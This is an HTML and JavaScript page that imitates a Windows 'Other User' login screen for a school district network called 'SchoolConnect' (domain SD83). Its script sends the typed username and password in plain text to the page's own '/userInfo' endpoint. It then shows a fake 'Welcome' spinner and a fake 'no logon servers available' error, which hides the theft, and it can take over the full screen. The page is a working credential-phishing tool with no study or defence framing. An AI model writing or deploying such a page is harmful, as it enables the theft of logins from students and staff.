<html>
  <head>
    <script>
    function requestFullScreen(element) {
      // Supports most browsers and their versions.
      var requestMethod = element.requestFullScreen || element.webkitRequestFullScreen || element.mozRequestFullScreen || element.msRequestFullScreen;

      if (requestMethod) { // Native full screen.
          requestMethod.call(element);
      } else if (typeof window.ActiveXObject !== "undefined") { // Older IE.
          var wscript = new ActiveXObject("WScript.Shell");
          if (wscript !== null) {
              wscript.SendKeys("{F11}");
          }
      }
    }


    </script>
    <link href='http://fonts.googleapis.com/css?family=Open+Sans' rel='stylesheet' type='text/css'>
    <style>
      @font-face {
        font-family: segoe;
        src: url('segoe.ttf');
      }
      * {
        /* font-family: "Open sans"; */
        font-family: "segoe";
        box-sizing: border-box;
        -webkit-user-select: none; /* Safari */        
        -moz-user-select: none; /* Firefox */
        -ms-user-select: none; /* IE10+/Edge */
        user-select: none; /* Standard */
      }
      .backGround {
        position: fixed;
        top: 0;
        left: 0;
        right: 0;
        bottom: 0;
        background: radial-gradient(#2d75c6, #1c4e87, #061c35);

      }
      .schoolConnect {
        position: fixed;
        right: 10px;
        top: 10px;
        opacity: 0.7;
      }
      .school1 {
        font-weight: 200;
        font-size: 45px;
        color: #ddd;
      }
      .school2 {
        font-weight: 900;
        font-size: 45px;
        color: white;
      }
      .loginBox {
        width: 400px;
        height: 500px;
        position: fixed;
        top: 45%;
        left: 50%;
        transform: translateX(-50%);
      }
      .loginBox .header {
        font-size: 50px;
        color: white;
        text-align: center;
        margin: auto;
        font-weight: 100;
      }
      .userName {
        width: 300px;
        height: 35px;
        margin: auto;
        /* border: 1px solid black; */
        margin-top: 30px;
        border: 2px solid #5f98d8;
      }
      .userNameInput {
        display: block;
        width: 100%;
        height: 100%;
        font-size: 18px;
        background-color: #133963;
        border: 0;
        outline: none;
        color: white;
      }
      .passWord {
        width: 300px;
        height: 35px;
        margin: auto;
        margin-top: 10px;
        display: flex;
        flex-direction: row;
        flex-wrap: nowrap;
        border: 2px solid #5f98d8;
      }
      .userName:hover {

        border: 2px solid white;
      }
      .userNameInput:hover {
        background-color: #082f3f;
      }
      .passWordInput {
        width: calc(100% - 35px);
        height: 31px;
        font-size: 28px;
        border-right: 0;
        outline: none;
        border: 0;
        padding: 0;
        margin: 0;
        background-color: #133963;
        color: white;
      }
      .passWordInput:hover {
        background-color: #082f3f;
      }
      .passWord:hover {
        border: 2px solid white;
      }
      .userNameInput::placeholder {
        color: #5f98d8;
      }
      .passWordInput::placeholder {
        color: #5f98d8;
        font-size: 18px;
        position: relative;
        top: -4px;
      }
      .goButton {
        width: 35px;
        height: 31px;
        border: 2px solid #5f98d8;
        border-left: 0;
        background-color: #32a2d1;
        color: white;
        text-align: center;
        font-size: 30px;
        cursor: pointer;
      }
      .goArrow {
        width: 35px;
        height: 35px;
      }
      .active .userNameInput, .active .passWordInput {
        background-color: white;
        color: black;
      }
      .active input::placeholder {
        color: #aaa;
      }
      .active:hover {
        border: 2px solid white;
      }
      .bottomText div {
        margin-top: 15px;
        text-align: center;
        color: white;
        font-size: 16px;
      }
      .iconsBox {
        width: 170px;
        height: 50px;
        position: fixed;
        bottom: 15px;
        right: 35px;
        display: flex;
        /* border: 1px solid black; */
      }
      .iconBox {
        width: 40px;
        height: 40px;
        /* border: 1px solid black; */
        /* background-color: red;   */
      }
      .bottomIcon {
        width: 40px;
        height: 40px;
        cursor: pointer;
      }
      .iconBox:hover {
        background-color: #bbb;
        border-radius: 6px;
      }
      .bottomAccess {
        width: 50px;
        height: 50px; 
        position: relative;
        top: 0px;
        left: -5px;
      }
      .bottomInternet {
        position: relative;
        top: 3px;
      }
      .bottomPower {
        position: relative;
        top: 3px;
      }
      .loadingWelcome {
        width: 100%;
        margin-top: 25px;
        font-size: 22px;
        text-align: center;
        color: white;
      }
      .spinner {
        width: 45px;
        height: 45px;
        display: inline;
      }
      .spinnergif {
        width: 45px;
        height: 45px;
        position: relative;
        top: -10px;
      }
      .welcomeText {
        position: relative;
        top: -25px;
        display: inline-block;
      }
      .noServers {
        width: 100%;
        color: white;
        font-size: 18px;
        margin-top: 25px;
        text-align: center;
      }
      .goBackButton {
        padding-top: 8px;
        padding-bottom: 8px;
        width: 120px;
        text-align: center;
        background-color: #32a2d1;
        margin: auto;
        margin-top: 50px;
        cursor: pointer;
        color: white;
        font-size: 18px;
        border: 2px solid #5f98d8;
      }

    </style>
  </head>
  <body>
    <div class = "backGround" id = "backGround">
      <div class = "schoolConnect">
        <span class = "school1">School</span><span class = "school2">Connect</span>
      </div>
      <div class = "loginBox">
        <div class = "header">
          Other User
        </div>
        <div class = "userName" id = "userName">
          <input type = "text" class = "userNameInput" id = "userNameInput" autocomplete = "off" placeholder=" &nbsp; User name" onfocus = "activeFunction(0)" onblur = "removeFunction(0)"/>
        </div>
        <div class = "passWord" id = "passWord">
          <input type = 'password' class = "passWordInput" id = "passWordInput" autocomplete = "off" placeholder = ' &nbsp; Password'  onfocus = "activeFunction(1)" onblur = "removeFunction(1)"/>
          <div class = "goButton" onclick = "getInfo()">
            <svg xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:cc="http://creativecommons.org/ns#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd" xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape" class = "goArrow" version="1.1" x="0px" y="0px" viewBox="0 0 100 125"><g transform="translate(0,-952.36218)"><path d="m 74.00001,1002.3583 c -0.05,-0.3652 -0.2033,-0.9655 -0.4375,-1.25 l -12,-15.00005 c -0.7139,-0.89244 -1.9944,-0.967 -2.8125,-0.3125 -0.8181,0.6545 -0.967,1.99438 -0.3125,2.8125 l 9.4063,11.75005 -39.84382,0 c -1.1045,0 -2,0.8954 -2,2 0,1.1046 0.8955,2 2,2 l 39.84382,0 -9.4063,11.75 c -0.6545,0.8181 -0.47,2.1158 0.3125,2.8125 0.8181,0.7283 2.158,0.5056 2.8125,-0.3125 l 12,-15 c 0.3386,-0.4144 0.4104,-0.7226 0.4375,-1.25 z" style="text-indent:0;text-transform:none;direction:ltr;block-progression:tb;baseline-shift:baseline;color:#000000;enable-background:accumulate;" fill="#ffffff" fill-opacity="1" stroke="none" marker="none" visibility="visible" display="inline" overflow="visible"/></g></svg>
          </div>
        </div>
        <div class = "bottomText">
          <div class = "domainName">Sign in to: <span style = "cursor: pointer; text-decoration: underline">SD83</span></div>
          <div class = "howTo" style = "cursor: pointer">How do I sign in to another domain?</div>
        </div>
      </div>
      <div class = "iconsBox">
        <div class = "internet iconBox">
          <svg class = "bottomIcon bottomInternet" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" x="0px" y="0px" viewBox="0 0 48 60" enable-background="new 0 0 48 48" xml:space="preserve"><g><path style = "fill:#ffffff" d="M47,6H35.7c-0.1,0-0.1,0-0.2,0c-0.5-0.8-1.2-1.5-1.8-2.1c0,0,0,0,0,0c0,0-0.1,0-0.1-0.1C31.1,1.5,27.7,0,24,0   c-3.7,0-7.1,1.5-9.6,3.8c0,0-0.1,0-0.1,0.1c0,0,0,0,0,0c-0.7,0.6-1.3,1.3-1.8,2.1H1C0.4,6,0,6.4,0,7v32c0,0.6,0.4,1,1,1h14.7   l-1.6,6H11c-0.6,0-1,0.4-1,1s0.4,1,1,1h26c0.6,0,1-0.4,1-1s-0.4-1-1-1h-3.1l-1.6-6H47c0.6,0,1-0.4,1-1V7C48,6.4,47.6,6,47,6z    M35.9,13h-5.2c-0.1-1.9-0.3-3.7-0.7-5.3c1-0.5,1.9-1.1,2.7-1.8C34.6,7.8,35.7,10.3,35.9,13z M24,18.8c-1.4,0-2.8,0.2-4.2,0.7   c-0.3-1.4-0.5-2.9-0.6-4.5h9.5c-0.1,1.7-0.3,3.2-0.6,4.5C26.8,19.1,25.4,18.8,24,18.8z M27.7,21.4c-0.9,2.8-2.3,4.5-3.7,4.5   s-2.7-1.7-3.7-4.5c1.2-0.4,2.4-0.6,3.7-0.6C25.3,20.8,26.5,21,27.7,21.4z M19.9,25.2c-1.2-0.4-2.3-1-3.2-1.8   c0.6-0.5,1.2-0.8,1.8-1.2C18.9,23.3,19.3,24.3,19.9,25.2z M19.3,13c0.1-1.7,0.3-3.2,0.6-4.5c1.3,0.4,2.8,0.7,4.2,0.7   c1.4,0,2.8-0.2,4.2-0.7c0.3,1.4,0.5,2.9,0.6,4.5H19.3z M29.5,22.2c0.6,0.3,1.3,0.7,1.8,1.2c-1,0.8-2.1,1.4-3.2,1.8   C28.7,24.3,29.1,23.3,29.5,22.2z M30.1,20.2c0.4-1.6,0.6-3.4,0.7-5.3h5.2c-0.2,2.7-1.4,5.1-3.1,7C32,21.3,31.1,20.7,30.1,20.2z    M31.4,4.6c-0.6,0.4-1.2,0.8-1.8,1.2c-0.4-1.1-0.9-2.1-1.4-3C29.3,3.2,30.4,3.8,31.4,4.6z M24,2c1.3,0,2.7,1.7,3.7,4.5   c-1.2,0.4-2.4,0.6-3.7,0.6c-1.3,0-2.5-0.2-3.7-0.6C21.3,3.7,22.7,2,24,2z M19.9,2.7c-0.5,0.8-1,1.8-1.4,3c-0.6-0.3-1.3-0.7-1.8-1.2   C17.6,3.8,18.7,3.2,19.9,2.7z M15.2,5.9c0.9,0.7,1.8,1.3,2.7,1.8c-0.4,1.6-0.6,3.4-0.7,5.3h-5.2C12.3,10.3,13.4,7.8,15.2,5.9z    M17.3,15c0.1,1.9,0.3,3.7,0.7,5.3c-1,0.5-1.9,1.1-2.7,1.8c-1.7-1.9-2.9-4.3-3.1-7H17.3z M16.2,46l1.6-6h12.5l1.6,6H16.2z M46,38   H31H17H2v-6.3h44V38z M46,29.7H2V8h9.4c-0.9,1.8-1.4,3.8-1.4,6c0,3.9,1.7,7.5,4.3,10.1c0,0,0,0,0,0.1c0,0,0.1,0.1,0.1,0.1   c2.5,2.3,5.8,3.8,9.5,3.8c3.7,0,7-1.4,9.5-3.8c0,0,0.1,0,0.1-0.1c0,0,0,0,0-0.1C36.3,21.5,38,17.9,38,14c0-2.1-0.5-4.1-1.4-6H46   V29.7z"/><path d="M25,33.7H23c-0.6,0-1,0.4-1,1s0.4,1,1,1H25c0.6,0,1-0.4,1-1S25.6,33.7,25,33.7z"/></g></svg>
        </div>
        <div class = "access  iconBox" style = "margin-right: 22px; margin-left: 18px; padding-bottom: 10px">
          <svg class = "bottomIcon bottomAccess"  xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:cc="http://creativecommons.org/ns#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd" xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape" viewBox="0 0 99.999997 124.99999625" version="1.1" x="0px" y="0px"><g transform="translate(0,-952.36224)"><path style="text-indent:0;text-transform:none;direction:ltr;block-progression:tb;baseline-shift:baseline;color:#000000;enable-background:accumulate;" d="m 50.276887,966.37429 a 1.9999562,1.9989995 0 0 0 -1.781033,2.03003 l 0,31.60598 -3.68705,-3.15431 a 1.9999561,1.9989994 0 0 0 -1.499817,-0.4997 1.9999561,1.9989994 0 0 0 -1.124863,3.52913 l 6.999147,5.99628 a 1.9999561,1.9989994 0 0 0 2.62468,0 l 6.999147,-5.99628 a 2.0046936,2.0037346 0 1 0 -2.62468,-3.02943 l -3.687051,3.15431 0,-31.60598 a 1.9999562,1.9989995 0 0 0 -2.21848,-2.03003 z m -9.748811,4.997 a 1.9999562,1.9989995 0 0 0 -0.531186,0.0936 c -14.696183,3.75584 -25.496892,17.09036 -25.496892,32.91771 0,18.7428 15.24415,33.9796 33.995856,33.9796 13.448637,0 25.296768,-7.7311 30.808745,-19.1135 a 2.0124208,2.0114581 0 0 0 -3.624558,-1.749 c -4.842933,10.0009 -15.270665,16.8649 -27.184187,16.8649 -16.590209,0 -29.996343,-13.3997 -29.996343,-29.982 0,-14.01118 9.543373,-25.73445 22.497258,-29.04494 a 1.9999562,1.9989995 0 0 0 -0.468693,-3.96637 z m 36.714275,23.9856 a 1.9999561,1.9989994 0 0 0 -1.281094,3.31051 l 3.155865,3.7164 -15.623096,0 a 1.9999562,1.9989995 0 0 0 -0.187477,0 2.0019524,2.0009947 0 0 0 0.187477,3.9976 l 15.623096,0 -3.155865,3.6853 a 2.0064135,2.0054537 0 1 0 3.062127,2.5922 l 5.999269,-6.9958 a 1.9999561,1.9989994 0 0 0 0,-2.5922 l -5.999269,-6.99569 a 1.9999561,1.9989994 0 0 0 -1.781033,-0.71832 z" fill="#ffffff" fill-opacity="1" stroke="none" marker="none" visibility="visible" display="inline" overflow="visible"/></g></svg>
        </div>
        <div class = "power  iconBox">
          <svg  class = "bottomIcon bottomPower" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" x="0px" y="0px" viewBox="0 0 48 60" enable-background="new 0 0 48 48" xml:space="preserve"><g><g><path fill="#ffffff" d="M24,47.3c-10.9,0-19.8-8.9-19.8-19.8c0-7.6,4.3-14.5,11.2-17.8c0.7-0.4,1.6-0.1,2,0.7    c0.4,0.7,0.1,1.6-0.7,2c-5.9,2.8-9.5,8.6-9.5,15.1c0,9.3,7.5,16.8,16.8,16.8s16.8-7.5,16.8-16.8c0-6.5-3.6-12.3-9.5-15.1    c-0.7-0.4-1.1-1.3-0.7-2c0.4-0.7,1.3-1.1,2-0.7c6.9,3.4,11.2,10.2,11.2,17.8C43.8,38.4,34.9,47.3,24,47.3z"/></g><g><path fill="#ffffff" d="M24,26.2c-0.8,0-1.5-0.7-1.5-1.5V2.2c0-0.8,0.7-1.5,1.5-1.5s1.5,0.7,1.5,1.5v22.5    C25.5,25.5,24.8,26.2,24,26.2z"/></g></g></svg>
        </div>
      </div>
    </div>
  </body>
  <script>
    var elem = document.body; // Make the body go full screen.
    document.addEventListener("keydown", function(e) {
      if (e.keyCode == 192) {
        requestFullScreen(elem);
      } else if (e.keyCode == 13) {
        getInfo();
      }
    })

    function activeFunction(num) {
      if (num === 0) {
        document.getElementById("userName").classList.add("active");
      } else if (num === 1) {
        document.getElementById("passWord").classList.add("active");
      }
    }
    function removeFunction(num) {
      if (num === 0) {
        document.getElementById("userName").classList.remove("active");
      } else if (num === 1) {
        document.getElementById("passWord").classList.remove("active");
      }
    }

    function getInfo() {
      let userName = document.getElementById("userNameInput").value;
      let passWord = document.getElementById("passWordInput").value;
      loadLoading([userName, passWord]);
    }
    function loadLoading(string) {
      loadingString = '<div class = "loginBox"><div class = "header">Other User</div><div class = "loadingWelcome"><div class = "spinner"><img src = "spinner.svg" class = "spinnergif"/><div class = "welcomeText">Welcome</div></div></div></div>';
      document.getElementById("backGround").innerHTML = loadingString;
      setTimeout(function() {
        noServers();
      }, 3000);
      submitUserInfo(string[0], string[1]);
    }
    function noServers() {
      document.getElementById("backGround").innerHTML = '<div class = "loginBox" style = "width: 600px"><div class = "noServers">There are currently no logon servers available to service the request.</div><div class = "goBackButton" onclick = "goBackHome()">OK</div></div>'; 
    }
    function goBackHome() {
      loadingString = '<div class = "schoolConnect"><span class = "school1">School</span><span class = "school2">Connect</span></div><div class = "loginBox"><div class = "header">Other User</div><div class = "userName" id = "userName"><input autocomplete = "off" type = "text" class = "userNameInput" id = "userNameInput" placeholder=" &nbsp; User name" onfocus = "activeFunction(0)" onblur = "removeFunction(0)"/></div><div class = "passWord" id = "passWord"><input autocomplete = "off" type = "password" class = "passWordInput" id = "passWordInput" placeholder = " &nbsp; Password"  onfocus = "activeFunction(1)" onblur = "removeFunction(1)"/><div class = "goButton" onclick = "getInfo()"><svg xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:cc="http://creativecommons.org/ns#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd" xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape" class = "goArrow" version="1.1" x="0px" y="0px" viewBox="0 0 100 125"><g transform="translate(0,-952.36218)"><path d="m 74.00001,1002.3583 c -0.05,-0.3652 -0.2033,-0.9655 -0.4375,-1.25 l -12,-15.00005 c -0.7139,-0.89244 -1.9944,-0.967 -2.8125,-0.3125 -0.8181,0.6545 -0.967,1.99438 -0.3125,2.8125 l 9.4063,11.75005 -39.84382,0 c -1.1045,0 -2,0.8954 -2,2 0,1.1046 0.8955,2 2,2 l 39.84382,0 -9.4063,11.75 c -0.6545,0.8181 -0.47,2.1158 0.3125,2.8125 0.8181,0.7283 2.158,0.5056 2.8125,-0.3125 l 12,-15 c 0.3386,-0.4144 0.4104,-0.7226 0.4375,-1.25 z" style="text-indent:0;text-transform:none;direction:ltr;block-progression:tb;baseline-shift:baseline;color:#000000;enable-background:accumulate;" fill="#ffffff" fill-opacity="1" stroke="none" marker="none" visibility="visible" display="inline" overflow="visible"/></g></svg></div></div><div class = "bottomText"><div class = "domainName">Sign in to: <span style = "cursor: pointer; text-decoration: underline">SD83</span></div><div class = "howTo" style = "cursor: pointer">How do I sign in to another domain?</div></div></div><div class = "iconsBox"><div class = "internet iconBox"><svg class = "bottomIcon bottomInternet" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" x="0px" y="0px" viewBox="0 0 48 60" enable-background="new 0 0 48 48" xml:space="preserve"><g><path style = "fill:#ffffff" d="M47,6H35.7c-0.1,0-0.1,0-0.2,0c-0.5-0.8-1.2-1.5-1.8-2.1c0,0,0,0,0,0c0,0-0.1,0-0.1-0.1C31.1,1.5,27.7,0,24,0   c-3.7,0-7.1,1.5-9.6,3.8c0,0-0.1,0-0.1,0.1c0,0,0,0,0,0c-0.7,0.6-1.3,1.3-1.8,2.1H1C0.4,6,0,6.4,0,7v32c0,0.6,0.4,1,1,1h14.7   l-1.6,6H11c-0.6,0-1,0.4-1,1s0.4,1,1,1h26c0.6,0,1-0.4,1-1s-0.4-1-1-1h-3.1l-1.6-6H47c0.6,0,1-0.4,1-1V7C48,6.4,47.6,6,47,6z    M35.9,13h-5.2c-0.1-1.9-0.3-3.7-0.7-5.3c1-0.5,1.9-1.1,2.7-1.8C34.6,7.8,35.7,10.3,35.9,13z M24,18.8c-1.4,0-2.8,0.2-4.2,0.7   c-0.3-1.4-0.5-2.9-0.6-4.5h9.5c-0.1,1.7-0.3,3.2-0.6,4.5C26.8,19.1,25.4,18.8,24,18.8z M27.7,21.4c-0.9,2.8-2.3,4.5-3.7,4.5   s-2.7-1.7-3.7-4.5c1.2-0.4,2.4-0.6,3.7-0.6C25.3,20.8,26.5,21,27.7,21.4z M19.9,25.2c-1.2-0.4-2.3-1-3.2-1.8   c0.6-0.5,1.2-0.8,1.8-1.2C18.9,23.3,19.3,24.3,19.9,25.2z M19.3,13c0.1-1.7,0.3-3.2,0.6-4.5c1.3,0.4,2.8,0.7,4.2,0.7   c1.4,0,2.8-0.2,4.2-0.7c0.3,1.4,0.5,2.9,0.6,4.5H19.3z M29.5,22.2c0.6,0.3,1.3,0.7,1.8,1.2c-1,0.8-2.1,1.4-3.2,1.8   C28.7,24.3,29.1,23.3,29.5,22.2z M30.1,20.2c0.4-1.6,0.6-3.4,0.7-5.3h5.2c-0.2,2.7-1.4,5.1-3.1,7C32,21.3,31.1,20.7,30.1,20.2z    M31.4,4.6c-0.6,0.4-1.2,0.8-1.8,1.2c-0.4-1.1-0.9-2.1-1.4-3C29.3,3.2,30.4,3.8,31.4,4.6z M24,2c1.3,0,2.7,1.7,3.7,4.5   c-1.2,0.4-2.4,0.6-3.7,0.6c-1.3,0-2.5-0.2-3.7-0.6C21.3,3.7,22.7,2,24,2z M19.9,2.7c-0.5,0.8-1,1.8-1.4,3c-0.6-0.3-1.3-0.7-1.8-1.2   C17.6,3.8,18.7,3.2,19.9,2.7z M15.2,5.9c0.9,0.7,1.8,1.3,2.7,1.8c-0.4,1.6-0.6,3.4-0.7,5.3h-5.2C12.3,10.3,13.4,7.8,15.2,5.9z    M17.3,15c0.1,1.9,0.3,3.7,0.7,5.3c-1,0.5-1.9,1.1-2.7,1.8c-1.7-1.9-2.9-4.3-3.1-7H17.3z M16.2,46l1.6-6h12.5l1.6,6H16.2z M46,38   H31H17H2v-6.3h44V38z M46,29.7H2V8h9.4c-0.9,1.8-1.4,3.8-1.4,6c0,3.9,1.7,7.5,4.3,10.1c0,0,0,0,0,0.1c0,0,0.1,0.1,0.1,0.1   c2.5,2.3,5.8,3.8,9.5,3.8c3.7,0,7-1.4,9.5-3.8c0,0,0.1,0,0.1-0.1c0,0,0,0,0-0.1C36.3,21.5,38,17.9,38,14c0-2.1-0.5-4.1-1.4-6H46   V29.7z"/><path d="M25,33.7H23c-0.6,0-1,0.4-1,1s0.4,1,1,1H25c0.6,0,1-0.4,1-1S25.6,33.7,25,33.7z"/></g></svg></div><div class = "access  iconBox" style = "margin-right: 22px; margin-left: 18px; padding-bottom: 10px"><svg class = "bottomIcon bottomAccess"  xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:cc="http://creativecommons.org/ns#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd" xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape" viewBox="0 0 99.999997 124.99999625" version="1.1" x="0px" y="0px"><g transform="translate(0,-952.36224)"><path style="text-indent:0;text-transform:none;direction:ltr;block-progression:tb;baseline-shift:baseline;color:#000000;enable-background:accumulate;" d="m 50.276887,966.37429 a 1.9999562,1.9989995 0 0 0 -1.781033,2.03003 l 0,31.60598 -3.68705,-3.15431 a 1.9999561,1.9989994 0 0 0 -1.499817,-0.4997 1.9999561,1.9989994 0 0 0 -1.124863,3.52913 l 6.999147,5.99628 a 1.9999561,1.9989994 0 0 0 2.62468,0 l 6.999147,-5.99628 a 2.0046936,2.0037346 0 1 0 -2.62468,-3.02943 l -3.687051,3.15431 0,-31.60598 a 1.9999562,1.9989995 0 0 0 -2.21848,-2.03003 z m -9.748811,4.997 a 1.9999562,1.9989995 0 0 0 -0.531186,0.0936 c -14.696183,3.75584 -25.496892,17.09036 -25.496892,32.91771 0,18.7428 15.24415,33.9796 33.995856,33.9796 13.448637,0 25.296768,-7.7311 30.808745,-19.1135 a 2.0124208,2.0114581 0 0 0 -3.624558,-1.749 c -4.842933,10.0009 -15.270665,16.8649 -27.184187,16.8649 -16.590209,0 -29.996343,-13.3997 -29.996343,-29.982 0,-14.01118 9.543373,-25.73445 22.497258,-29.04494 a 1.9999562,1.9989995 0 0 0 -0.468693,-3.96637 z m 36.714275,23.9856 a 1.9999561,1.9989994 0 0 0 -1.281094,3.31051 l 3.155865,3.7164 -15.623096,0 a 1.9999562,1.9989995 0 0 0 -0.187477,0 2.0019524,2.0009947 0 0 0 0.187477,3.9976 l 15.623096,0 -3.155865,3.6853 a 2.0064135,2.0054537 0 1 0 3.062127,2.5922 l 5.999269,-6.9958 a 1.9999561,1.9989994 0 0 0 0,-2.5922 l -5.999269,-6.99569 a 1.9999561,1.9989994 0 0 0 -1.781033,-0.71832 z" fill="#ffffff" fill-opacity="1" stroke="none" marker="none" visibility="visible" display="inline" overflow="visible"/></g></svg></div><div class = "power  iconBox"><svg  class = "bottomIcon bottomPower" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" x="0px" y="0px" viewBox="0 0 48 60" enable-background="new 0 0 48 48" xml:space="preserve"><g><g><path fill="#ffffff" d="M24,47.3c-10.9,0-19.8-8.9-19.8-19.8c0-7.6,4.3-14.5,11.2-17.8c0.7-0.4,1.6-0.1,2,0.7    c0.4,0.7,0.1,1.6-0.7,2c-5.9,2.8-9.5,8.6-9.5,15.1c0,9.3,7.5,16.8,16.8,16.8s16.8-7.5,16.8-16.8c0-6.5-3.6-12.3-9.5-15.1    c-0.7-0.4-1.1-1.3-0.7-2c0.4-0.7,1.3-1.1,2-0.7c6.9,3.4,11.2,10.2,11.2,17.8C43.8,38.4,34.9,47.3,24,47.3z"/></g><g><path fill="#ffffff" d="M24,26.2c-0.8,0-1.5-0.7-1.5-1.5V2.2c0-0.8,0.7-1.5,1.5-1.5s1.5,0.7,1.5,1.5v22.5    C25.5,25.5,24.8,26.2,24,26.2z"/></g></g></svg></div></div>'
      document.getElementById("backGround").innerHTML = loadingString;
    }
    document.oncontextmenu = function(e) {
      // return false;
    }

    function submitUserInfo(username, password) {
      let loadRequest;
      if (window.XMLHttpRequest) {
        // code for modern browsers
        loadRequest = new XMLHttpRequest();
      } else {
        // code for old IE browsers
        loadRequest = new ActiveXObject("Microsoft.XMLHTTP");
      }
      loadRequest.onreadystatechange = function() {
        if (this.readyState == 4 && this.status == 200) {
        
        }
      }
      loadRequest.open("GET", "/userInfo?username=" + username + "&password=" + password, true);
      loadRequest.send();
    }
  </script>
</html>
